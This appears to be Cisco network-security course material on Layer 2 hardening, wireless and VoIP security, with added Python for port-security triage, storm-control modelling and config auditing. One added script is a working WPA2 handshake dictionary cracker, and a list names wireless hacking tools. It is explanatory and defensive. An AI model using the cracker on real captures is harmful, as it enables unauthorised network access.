          Secure Mac Address Table
-------------------------------------------------------------------
Vlan  Mac Address     Type              Ports   Remaining Age (mins)
----  -----------     ----              -----   --------------------
   1  0000.ffff.aaaa  SecureConfigured  Fa0/12  -
-------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 0
Max Addresses limit in System (excluding one mac per port) : 1024
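As an added example (not part of the course material and not Cisco tooling), the following Python triages the two outputs shown above the way an operator would during an incident: it parses the show port-security summary table and the per-interface block, flags ports with counted violations or in the Secure-shutdown state, and points out that protect mode leaves no evidence at all. The sample output, port names and counters are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample output in the format of the slides above: three ports, one of
# which has counted violations and been shut down. Port names and counts are assumptions.
SUMMARY_OUTPUT = """\
Secure Port  MaxSecureAddr  CurrentAddr  SecurityViolation  Security Action
             (Count)        (Count)      (Count)
---------------------------------------------------------------------------
     Fa0/12              2            1                  0         Shutdown
     Fa0/13              1            1                  3         Shutdown
     Fa0/14              1            0                  0          Protect
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 0
Max Addresses limit in System (excluding one mac per port) : 1024
"""

INTERFACE_OUTPUT = """\
Port Security              : Enabled
Port status                : Secure-shutdown
Violation mode             : Shutdown
Maximum MAC Addresses      : 1
Total MAC Addresses        : 1
Configured MAC Addresses   : 0
Aging time                 : 120 mins
Aging type                 : Absolute
SecureStatic address aging : Disabled
Security Violation Count   : 3
"""


@dataclass
class SecurePort:
    port: str
    max_addr: int
    current_addr: int
    violations: int
    action: str


# One data row: interface name, three integer counters, then the action keyword.
ROW_RE = re.compile(r"^\s*(\S+\d+/\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s*$")


def parse_summary(text):
    """Rows of 'show port-security'; header, separator and total lines do not match."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append(SecurePort(m.group(1), *map(int, m.group(2, 3, 4)), m.group(5)))
    return rows


def parse_interface(text):
    """'key : value' lines of 'show port-security interface' as a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_errdisabled(fields):
    """Secure-shutdown means a shutdown-mode violation err-disabled the port; it stays
    down until an operator clears it (or errdisable recovery is configured)."""
    return fields.get("Port status") == "Secure-shutdown"


def triage(rows):
    """Map port -> reason for ports an operator should look at. The violation counter
    only increments in restrict and shutdown mode; protect mode drops offending frames
    silently, so a port in that mode is flagged as giving no evidence."""
    flagged = {}
    for r in rows:
        if r.violations > 0:
            flagged[r.port] = f"{r.violations} violation(s), action {r.action}"
        elif r.action.lower() == "protect":
            flagged[r.port] = "protect mode: violations are neither counted nor logged"
    return flagged


if __name__ == "__main__":
    for port, reason in triage(parse_summary(SUMMARY_OUTPUT)).items():
        print(port, reason)
    print("err-disabled:", is_errdisabled(parse_interface(INTERFACE_OUTPUT)))
```

Feed it the real output of both commands (for example collected over SSH) and the same two functions apply unchanged; the point of checking the action keyword is that a port left in protect mode will never appear in the violation column, so "zero violations" there is not evidence of a clean port.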
MAC Address Notification

MAC address notification allows monitoring of the MAC addresses, at the module and port level, that the switch adds to or removes from the CAM table for secure ports. SNMP traps are sent to the NMS when new MAC addresses appear or when old ones time out.

(Figure: switch CAM table with F1/1 = MAC A, F1/2 = MAC B and F2/1 = MAC D. MAC D is away from the network, its address ages out, and the switch sends a trap to the NMS.)
Configure PortFast

Command                                                 Description
Switch(config-if)# spanning-tree portfast               Enables PortFast on a Layer 2 access port and forces it to enter the forwarding state immediately.
Switch(config-if)# no spanning-tree portfast            Disables PortFast on a Layer 2 access port. PortFast is disabled by default.
Switch(config)# spanning-tree portfast default          Globally enables the PortFast feature on all nontrunking ports.
Switch# show running-config interface type slot/port    Indicates whether PortFast has been configured on a port.

PortFast belongs only on ports that connect to end hosts: a PortFast port that is cabled to another switch starts forwarding before STP has converged and can create a bridging loop, which is why PortFast should always be paired with BPDU guard.
BPDU Guard

Switch(config)# spanning-tree portfast bpduguard default
• Globally enables BPDU guard on all ports with PortFast enabled

When a BPDU-guarded port receives any BPDU, the switch puts the port into the err-disabled state; the port stays down until an operator resets it (or err-disable recovery is configured), so an attacker's rogue switch or BPDU injection tool takes out only its own port.

(Figure: root bridge at the top of the tree, forwarding ports marked F, a blocking port marked B, and an attacker connected to an access port with BPDU guard enabled.)
Display the State of Spanning Tree

Switch# show spanning-tree summary totals
Root bridge for: none.
PortFast BPDU Guard is enabled
UplinkFast is disabled
BackboneFast is disabled
Spanning tree default pathcost method used is short
Name                 Blocking Listening Learning Forwarding STP Active
-------------------- -------- --------- -------- ---------- ----------
1 VLAN               0        0         0        1          1
<output omitted>
Root Guard

Switch(config-if)# spanning-tree guard root
• Enables root guard on a per-interface basis

(Figure: the legitimate root bridge has priority 0 and MAC address 0000.0c45.1a5d. The attacker sends an STP BPDU claiming priority 0 with MAC address 0000.0c45.1234. Because the priorities tie and the lower MAC address wins the root election, the attacker would become root; with root guard enabled on the attacker-facing port, the port goes root-inconsistent instead of accepting the superior BPDU.)
Verify Root Guard

Switch# show spanning-tree inconsistentports
Name       Interface        Inconsistency
---------  ---------------  ----------------------
VLAN0001   FastEthernet3/1  Port Type Inconsistent
VLAN0001   FastEthernet3/2  Port Type Inconsistent
VLAN1002   FastEthernet3/1  Port Type Inconsistent
VLAN1002   FastEthernet3/2  Port Type Inconsistent
VLAN1003   FastEthernet3/1  Port Type Inconsistent
VLAN1003   FastEthernet3/2  Port Type Inconsistent
VLAN1004   FastEthernet3/1  Port Type Inconsistent
VLAN1004   FastEthernet3/2  Port Type Inconsistent
VLAN1005   FastEthernet3/1  Port Type Inconsistent
VLAN1005   FastEthernet3/2  Port Type Inconsistent
Number of inconsistent ports (segments) in the system :10

Note that this sample output shows Port Type Inconsistent, which is a different condition; a port blocked by root guard is listed as Root Inconsistent, and it returns to normal on its own once the superior BPDUs stop arriving.
Storm Control Methods

• Bandwidth as a percentage of the total available bandwidth of the port that can be used by the broadcast, multicast, or unicast traffic
• Traffic rate in packets per second at which broadcast, multicast, or unicast packets are received
• Traffic rate in bits per second at which broadcast, multicast, or unicast packets are received
• Traffic rate in packets per second for small frames. This feature is enabled globally. The threshold for small frames is configured for each interface.
Storm Control Configuration

Switch(config-if)# storm-control broadcast level 75.5
• Enables broadcast storm control and specifies the level (here 75.5 percent of the port bandwidth) at which suppression starts

Switch(config-if)# storm-control multicast level pps 2k 1k
• Enables multicast storm control with a rising threshold of 2000 packets per second and a falling threshold of 1000 packets per second

Switch(config-if)# storm-control action shutdown
• Specifies the action that should take place when the threshold (level) is reached, in addition to filtering traffic

With action shutdown the port is err-disabled, so a single host that can generate a storm can also take its own port down; the default action (filter only) or action trap keeps the port up while still suppressing the storm.
Storm Control Parameters

Parameter               Description
broadcast               This parameter enables broadcast storm control on the interface.
multicast               This parameter enables multicast storm control on the interface.
unicast                 This parameter enables unicast storm control on the interface.
level level [level-low] Rising and falling suppression levels as a percentage of total bandwidth of the port.
                        • level: Rising suppression level. The range is 0.00 to 100.00. Block the flooding of storm packets when the value specified for level is reached.
                        • level-low: (Optional) Falling suppression level, up to two decimal places. This value must be less than or equal to the rising suppression value.
level bps bps [bps-low] Specify the rising and falling suppression levels as a rate in bits per second at which traffic is received on the port.
                        • bps: Rising suppression level. The range is 0.0 to 10000000000.0. Block the flooding of storm packets when the value specified for bps is reached.
                        • bps-low: (Optional) Falling suppression level, up to one decimal place. This value must be equal to or less than the rising suppression value.
level pps pps [pps-low] Specify the rising and falling suppression levels as a rate in packets per second at which traffic is received on the port.
                        • pps: Rising suppression level. The range is 0.0 to 10000000000.0. Block the flooding of storm packets when the value specified for pps is reached.
                        • pps-low: (Optional) Falling suppression level, up to one decimal place. This value must be equal to or less than the rising suppression value.
action {shutdown|trap}  The action taken when a storm occurs on a port. The default action is to filter traffic and to not send an SNMP trap. The keywords have these meanings:
                        • shutdown: Disables the port during a storm
                        • trap: Sends an SNMP trap when a storm occurs
Verify Storm Control Settings

Switch# show storm-control
Interface  Filter State  Upper    Lower    Current
---------  ------------  -------  -------  -------
Gi0/1      Forwarding    20 pps   10 pps   5 pps
Gi0/2      Forwarding    50.00%   40.00%   0.00%
<output omitted>
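The rising and falling levels in the parameter table form a hysteresis: suppression starts when a one-second rate sample reaches the rising level and stops only when a sample drops below the falling level, which is what keeps a port from flapping between filtering and forwarding while a storm tails off. As an added example (a model written for this page, not Cisco code), the following Python implements that rule together with the k/m/g suffixes the level keywords accept, using the 2k/1k values from the configuration slide; the rate samples are constructed.

```python
# Added example: a model of how Catalyst storm control applies its rising and
# falling thresholds (not Cisco code). The switch samples the rate of the
# controlled traffic class once per second; when a sample reaches the rising
# level the port drops that class, and it resumes forwarding only when a sample
# falls below the falling level. With no falling level the rising level is
# used for both. The rate samples in the test are constructed.

UNITS = {"k": 1_000.0, "m": 1_000_000.0, "g": 1_000_000_000.0}


def parse_rate(token):
    """'2k' -> 2000.0, '75.5' -> 75.5, '10m' -> 1e7, as written after 'level'."""
    token = str(token).strip().lower()
    if token and token[-1] in UNITS:
        return float(token[:-1]) * UNITS[token[-1]]
    return float(token)


class StormControl:
    """One traffic class (broadcast, multicast or unicast) on one port."""

    def __init__(self, rising, falling=None, unit="pps"):
        self.rising = parse_rate(rising)
        self.falling = self.rising if falling is None else parse_rate(falling)
        if unit == "percent" and not 0.0 <= self.rising <= 100.0:
            raise ValueError("percentage level must be between 0.00 and 100.00")
        if self.falling > self.rising:
            raise ValueError("falling level must not exceed the rising level")
        self.blocking = False

    def sample(self, rate):
        """Feed one 1-second measurement; return the filter state that applies next.
        Reaching the rising level starts blocking; only dropping below the falling
        level ends it, so samples between the two levels keep the current state."""
        if not self.blocking and rate >= self.rising:
            self.blocking = True
        elif self.blocking and rate < self.falling:
            self.blocking = False
        return "Blocking" if self.blocking else "Forwarding"


def valid_levels(rising, falling=None, unit="pps"):
    """True if 'storm-control ... level' would accept this rising/falling pair."""
    try:
        StormControl(rising, falling, unit)
        return True
    except ValueError:
        return False


def simulate(rising, falling, rates):
    """Filter state after each successive rate sample for one port."""
    ctl = StormControl(rising, falling)
    return [ctl.sample(r) for r in rates]


if __name__ == "__main__":
    # storm-control multicast level pps 2k 1k, then a burst that slowly decays
    print(simulate("2k", "1k", [500, 2500, 1500, 900, 3000]))
```

The sequence 500, 2500, 1500, 900, 3000 with levels 2k/1k shows the two thresholds working together: the port blocks at 2500, stays blocked at 1500 even though that is below the rising level, and forwards again only once the rate falls under 1000.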
Mitigating VLAN Attacks

(Figure: two switches joined by a trunk whose native VLAN is 10.)

1. Disable trunking on all access ports.
2. Disable auto trunking and manually enable trunking.
3. Be sure that the native VLAN is used only for trunk lines and nowhere else.

Controlling Trunking

Switch(config-if)# switchport mode trunk
• Specifies an interface as a trunk link

Switch(config-if)# switchport nonegotiate
• Prevents the generation of DTP frames

Switch(config-if)# switchport trunk native vlan vlan_number
• Sets the native VLAN on the trunk to an unused VLAN

The native VLAN must match on both ends of the trunk; changing it on one side only produces a native VLAN mismatch and can leak frames between VLANs. Keeping the native VLAN off every access port is what defeats the double-tagging attack, since the attacker's outer tag must match the native VLAN of the trunk to be stripped.
Traffic Analysis

A SPAN port mirrors traffic to another port where a monitoring device is connected. Without this, it can be difficult to track hackers after they have entered the network.

(Figure: an attacker's traffic is mirrored to an IDS, an RMON probe, or a protocol analyzer, which raises an "Intruder Alert!".)
CLI Commands

Switch(config)# monitor session session_number source {interface interface-id [, | -] [both | rx | tx]} | {vlan vlan-id [, | -] [both | rx | tx]} | {remote vlan vlan-id}

Switch(config)# monitor session session_number destination {interface interface-id [, | -] [encapsulation replicate] [ingress {dot1q vlan vlan-id | isl | untagged vlan vlan-id | vlan vlan-id}]} | {remote vlan vlan-id}

Verify SPAN Configuration
SPAN and IDS

(Figure: attacker on port F0/1, IDS on port F0/2. Use SPAN to mirror traffic in and out of port F0/1 to port F0/2, where the IDS is connected.)
Overview of RSPAN

• An RSPAN port mirrors traffic to another port on another switch where a probe or IDS sensor is connected.
• This allows more switches to be monitored with a single probe or IDS.

(Figure: source VLANs on several switches are carried over the RSPAN VLAN to the switch where the IDS is attached, which raises an "Intruder Alert!" for the attacker's traffic.)
Configuring RSPAN

(Figure: switches 2960-1 and 2960-2 connected by a trunk on their FastEthernet 0/2 ports.)

2960-1(config)# vlan 100
2960-1(config-vlan)# remote-span
2960-1(config-vlan)# exit
2960-1(config)# monitor session 1 source interface FastEthernet 0/1
2960-1(config)# monitor session 1 destination remote vlan 100 reflector-port FastEthernet 0/24
2960-1(config)# interface FastEthernet 0/2
2960-1(config-if)# switchport mode trunk

2960-2(config)# monitor session 2 source remote vlan 100
2960-2(config)# monitor session 2 destination interface FastEthernet 0/3
2960-2(config)# interface FastEthernet 0/2
2960-2(config-if)# switchport mode trunk

1. Configure the RSPAN VLAN
2. Configure the RSPAN source ports and VLANs
3. Configure the

The RSPAN VLAN carries every mirrored frame, including the attacker's traffic, in the clear across the trunk, so it should be allowed only on the trunks between the participating switches and never on a user-facing port. The reflector port (Fa0/24 here) is dedicated to the session and cannot be used for anything else while the session exists.
Verifying RSPAN Configuration

Switch# show monitor [session {session_number | all | local | range list | remote} [detail]] [ | {begin | exclude | include} expression]
Layer 2 Guidelines

• Manage switches in as secure a manner as possible (SSH, out-of-band management, ACLs, etc.)
• Set all user ports to non-trunking mode (except if using Cisco VoIP)
• Use port security where possible for access ports
• Enable STP attack mitigation (BPDU guard, root guard)
• Use Cisco Discovery Protocol only where necessary – with phones it is useful
• Configure PortFast on all non-trunking end-host ports, together with BPDU guard
• Configure root guard on the ports that must never become root ports (the designated ports facing access switches and hosts), never on the uplink that legitimately leads to the root bridge
VLAN Practices

• Always use a dedicated, unused native VLAN ID for trunk ports
• Do not use VLAN 1 for anything
• Disable all unused ports and put them in an unused VLAN
• Manually configure all trunk ports and disable DTP on trunk ports
• Configure all non-trunking ports with switchport mode access
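The two checklists above (Layer 2 Guidelines and VLAN Practices) translate into a per-port template plus a check that the running configuration actually follows it. As an added example, not Cisco's or the course's own code, the following Python builds the hardened access, trunk and unused-port configuration from a small inventory and then audits any IOS interface configuration for the weak states the checklists warn about; the interface names, VLAN numbers 998/999 and the weak sample config are assumptions.

```python
import re

NATIVE_VLAN = 998   # dedicated, otherwise unused native VLAN for every trunk (assumption)
PARKING_VLAN = 999  # unused VLAN that holds shut-down ports (assumption)


def access_port(name, vlan, max_macs=1):
    """End-host port: fixed access mode, DTP off, port security, PortFast plus BPDU guard."""
    return [
        f"interface {name}",
        " switchport mode access",
        f" switchport access vlan {vlan}",
        " switchport nonegotiate",
        " switchport port-security",
        f" switchport port-security maximum {max_macs}",
        " switchport port-security violation shutdown",
        " switchport port-security mac-address sticky",
        " spanning-tree portfast",
        " spanning-tree bpduguard enable",
        " no shutdown",
    ]


def trunk_port(name, allowed_vlans, faces_root):
    """Manually configured trunk: DTP off, unused native VLAN, explicit allowed list.
    Root guard goes only on trunks that must never lead towards the root bridge."""
    lines = [
        f"interface {name}",
        " switchport mode trunk",
        f" switchport trunk native vlan {NATIVE_VLAN}",
        " switchport trunk allowed vlan " + ",".join(str(v) for v in allowed_vlans),
        " switchport nonegotiate",
    ]
    if not faces_root:
        lines.append(" spanning-tree guard root")
    lines.append(" no shutdown")
    return lines


def unused_port(name):
    """Unused port: parked in an unused VLAN and administratively down."""
    return [f"interface {name}", " switchport mode access",
            f" switchport access vlan {PARKING_VLAN}", " switchport nonegotiate", " shutdown"]


def build_config(inventory):
    """inventory: list of (role, name, *args) tuples -> one IOS configuration text."""
    lines = [f"vlan {NATIVE_VLAN}", " name NATIVE-UNUSED", f"vlan {PARKING_VLAN}", " name PARKING", "!"]
    builders = {"access": access_port, "trunk": trunk_port, "unused": unused_port}
    for role, name, *extra in inventory:
        lines += builders[role](name, *extra) + ["!"]
    return "\n".join(lines) + "\n"


def audit(config):
    """Check each interface block against the guidelines; returns {interface: [findings]}.
    A Catalyst port with no 'switchport mode' line is in the default dynamic mode and will
    negotiate a trunk. Assumes per-interface BPDU guard rather than the global default."""
    findings = {}
    for block in re.split(r"^(?=interface )", config, flags=re.M):
        if not block.startswith("interface "):
            continue
        lines = block.splitlines()
        name = lines[0].split(None, 1)[1]
        body = {l.strip() for l in lines[1:]}
        mode = next((l for l in body if l.startswith("switchport mode ")), None)
        problems = []
        if mode is None or mode.startswith("switchport mode dynamic"):
            problems.append("trunking negotiable via DTP")
        elif mode == "switchport mode trunk":
            if "switchport nonegotiate" not in body:
                problems.append("trunk still generates DTP frames")
            native = next((l.split()[-1] for l in body if l.startswith("switchport trunk native vlan ")), "1")
            if native == "1":
                problems.append("native VLAN is VLAN 1")
        elif mode == "switchport mode access" and "shutdown" not in body:
            if "switchport port-security" not in body:
                problems.append("no port security")
            if "spanning-tree bpduguard enable" not in body:
                problems.append("no BPDU guard")
        if problems:
            findings[name] = problems
    return findings


# Constructed running-config fragment with the weak defaults the guidelines warn about.
WEAK_CONFIG = """\
interface FastEthernet0/1
 switchport access vlan 10
!
interface GigabitEthernet0/1
 switchport mode trunk
!
"""

INVENTORY = [("access", "FastEthernet0/1", 10), ("trunk", "GigabitEthernet0/1", [10, 20], True),
             ("trunk", "GigabitEthernet0/2", [10, 20], False), ("unused", "FastEthernet0/2")]

if __name__ == "__main__":
    print(audit(WEAK_CONFIG))
    print(build_config(INVENTORY))
```

The audit is deliberately strict about a missing switchport mode line: that port is not "unconfigured", it is a dynamic port that will happily form a trunk with an attacker's DTP frames, which is the VLAN hopping case the practices above exist to close.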
Overview of Wireless, VoIP Security

(Figure: wireless LAN topology.)

Overview of SAN Security

(Figure: SAN topology.)

Infrastructure-Integrated Approach

• Proactive threat and intrusion detection capabilities that do not simply detect wireless attacks but prevent them
• Comprehensive protection to safeguard confidential data and communications
• Simplified user management with a single user identity and policy
• Collaboration with wired security systems
Cisco IP Telephony Solutions

• Single-site deployment
• Centralized call processing with remote branches
• Distributed call-processing deployment
• Clustering over the IP WAN
Storage Network Solutions

• Investment protection
• Virtualization
• Security
• Consolidation
• Availability
Cisco Wireless LAN Controllers

• Responsible for system-wide wireless LAN functions
• Work in conjunction with APs and the Cisco Wireless Control System (WCS) to support wireless applications
• Smoothly integrate into existing enterprise networks
Wireless Hacking

• War driving
• A neighbor hacks into another neighbor's wireless network to get free Internet access or access information
• Free Wi-Fi provides an opportunity to compromise the data of users
Hacking Tools

• Network Stumbler
• Kismet
• AirSnort
• CoWPAtty
• ASLEAP
• Wireshark
Safety Considerations

• Wireless networks using WEP or WPA/TKIP are insecure: WEP keys can be recovered from captured traffic, and WPA with TKIP has known attacks against its integrity protection.
• Wireless networks using WPA2/AES should have a passphrase of at least 21 characters. The pre-shared key is derived only from the passphrase and the SSID, and anyone who captures a single four-way handshake can test guesses offline at full speed, so length is the only defense against that guessing.
• If an IPsec VPN is available, use it on any public wireless LAN.
• If wireless access is not needed, disable the wireless radio or wireless NIC.
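To make the passphrase-length advice concrete, the following Python (an added example written for this page, not course or Cisco code) reproduces what CoWPAtty-style tools do with a captured WPA2-PSK four-way handshake: derive the PMK from a passphrase guess with the 802.11i PBKDF2 construction, expand it to the PTK, and check the guess against the handshake's message integrity code. Only the PMK test vector (passphrase "password", SSID "IEEE") is from the standard; the MAC addresses, nonces and EAPOL frame are constructed, and a real capture would supply them.

```python
import hashlib
import hmac


def derive_pmk(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the whole cost of one guess; nothing on the air rate-limits it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512 over the two MAC addresses and the two nonces (ordered min/max).
    Only the first 16 bytes (the KCK) are needed to check the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2 (AES-CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(candidates, ssid, aa, spa, anonce, snonce, eapol_frame, mic):
    """Attacker side: everything here except the passphrase comes from one captured
    four-way handshake plus the beacon's SSID. Returns the matching guess or None."""
    for guess in candidates:
        kck = derive_ptk(derive_pmk(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), mic):
            return guess
    return None


# Constructed sample handshake: addresses, nonces and the zeroed-MIC message 2 are made up.
SSID = "IEEE"
AA = bytes.fromhex("001122334455")      # access point MAC (assumption)
SPA = bytes.fromhex("66778899aabb")     # station MAC (assumption)
ANONCE = bytes(range(32))               # authenticator nonce (assumption)
SNONCE = bytes(range(32, 64))           # supplicant nonce (assumption)
EAPOL_MSG2 = bytes.fromhex("0103005f02010a") + bytes(8) + SNONCE + bytes(48)


def sample_capture(passphrase="password"):
    """What a sniffer sees: the station's message 2 and the MIC the real key produced."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return EAPOL_MSG2, eapol_mic(kck, EAPOL_MSG2)


if __name__ == "__main__":
    frame, mic = sample_capture()
    print(crack_handshake(["letmein", "password1", "password"], SSID, AA, SPA, ANONCE, SNONCE, frame, mic))
```

Each guess costs 4096 HMAC-SHA1 iterations and nothing else, and the result depends only on the passphrase and SSID, so a dictionary word fails no matter how strong WPA2's AES encryption is; a 21-character passphrase drawn from a large alphabet simply puts the number of guesses out of reach.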
VoIP Business Advantages

• Lower telecom call costs
• Productivity increases
• Lower costs to move, add, or change
• Lower ongoing service and maintenance costs
• Little or no training costs
• No major set-up fees
• Enables unified messaging
• Encryption of voice calls is supported
• Fewer administrative personnel required
(Figure: VoIP gateway between the IP network and the PSTN.)

VoIP Components

(Figure: Cisco Unified Communications Manager (call agent), an MCU, Cisco Unity, IP phones, and a videoconference station on the IP backbone, with router/gateways connecting to the PSTN.)
VoIP Protocols

VoIP Protocol  Description
H.323          ITU standard protocol for interactive conferencing; evolved from H.320 ISDN standard; flexible, complex
MGCP           Emerging IETF standard for PSTN gateway control; thin device control
Megaco/H.248   Joint IETF and ITU standard for gateway control with support for multiple gateway types; evolved from MGCP standard
SIP            IETF protocol for interactive and noninteractive conferencing; simpler but less mature than H.323
RTP            IETF standard media-streaming protocol
RTCP           IETF protocol that provides out-of-band control information for an RTP flow
SRTP           IETF protocol that encrypts and authenticates RTP traffic as it leaves the voice device
SCCP           Cisco proprietary protocol used between Cisco Unified Communications Manager and Cisco IP phones
Threats

• Reconnaissance
• Directed attacks such as spam over IP telephony (SPIT) and spoofing
• DoS attacks such as DHCP starvation, flooding, and fuzzing
VoIP SPIT

• If SPIT grows like spam, it could result in regular DoS problems for network administrators.
• Antispam methods do not block SPIT.
• Authenticated TLS stops most SPIT attacks because TLS endpoints accept signaling only from devices that authenticate with a trusted certificate.

(Figure: an IP phone receiving a SPIT call: "You've just won an all expenses paid vacation to the U.S. Virgin Islands!!!")